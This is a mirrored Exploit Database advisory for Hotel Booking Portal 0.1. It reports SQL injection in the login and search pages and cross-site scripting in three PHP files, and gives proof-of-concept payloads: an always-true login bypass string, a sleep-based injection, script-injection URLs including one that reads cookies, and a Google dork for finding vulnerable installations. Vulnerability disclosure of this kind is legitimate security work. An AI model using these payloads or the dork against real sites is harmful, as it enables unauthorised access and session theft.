Hotel Booking Portal 0.1 – Multiple Vulnerabilities

• Exploit Database
• 45 阅读

• 作者： Yakir Wizman
  日期： 2012-08-13
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/20476/

• # -----------------------------------------------------------
  #			 _____ _ ___ 
  #			/ ____(_) || || |
  #			 | | _| |_ __ ___| | ___| |
  #			 | || | __/ _` |/ _` |/ _ \ |
  #			 | |____| | || (_| | (_| |__/ |
  #			\_____|_|\__\__,_|\__,_|\___|_|
  #			
  # -----------------------------------------------------------
  # Hotel Booking Portal v0.1 Multiple Vulnerabilities
  # Google dork: "Made And Powered By Hotels Portal"
  # Bug discovered by Yakir Wizman, <yakir.wizman@gmail.com>
  # Date 09/08/2012
  # Download - http://sourceforge.net/projects/hbportal/
  # ISRAEL
  # -----------------------------------------------------------
  #		Author will be not responsible for any damage.
  # -----------------------------------------------------------
  # I. DESCRIPTION
  # -----------------------------------------------------------
  # 1). A vulnerability exists in 'login.php' - Allows for 'SQL injection' of the 'email' and 'password' POST parameters.
  # 2). A vulnerability exists in 'searchresults.php' - Allows for 'SQL injection' of the 'country' POST parameter.
  # 3). A vulnerability exists in 'includes/languagebar.php' - Allows for 'Cross site scripting' of the 'window.location' js
  # 4). A vulnerability exists in 'administrator/login.php' - Allows for 'Cross site scripting' of the 'window.location' js
  # 5). A vulnerability exists in 'index.php' - Allows for 'Cross site scripting' of the 'lang' GET parameter.
  #
  # -----------------------------------------------------------
  # II. PoC EXPLOIT
  # -----------------------------------------------------------
  # 1). POST a form to login.php with the value of:
  # email set to		: ' or '1'='1
  # password set to	: ' or '1'='1
  # 2). POST to searchresults.php with the value of 'country' set to Armenia' and sleep(1)='
  # 3). http://127.0.0.1/hbportal/includes/languagebar.php?xss=";</script><script>alert(1);</script><script>
  # 4). http://127.0.0.1/hbportal/administrator/login.php?xss=";</script><script>alert(1);</script><script>
  # 5). http://127.0.0.1/hbportal/index.php?lang=";</script><script>alert(document.cookie);</script><script>
  # -----------------------------------------------------------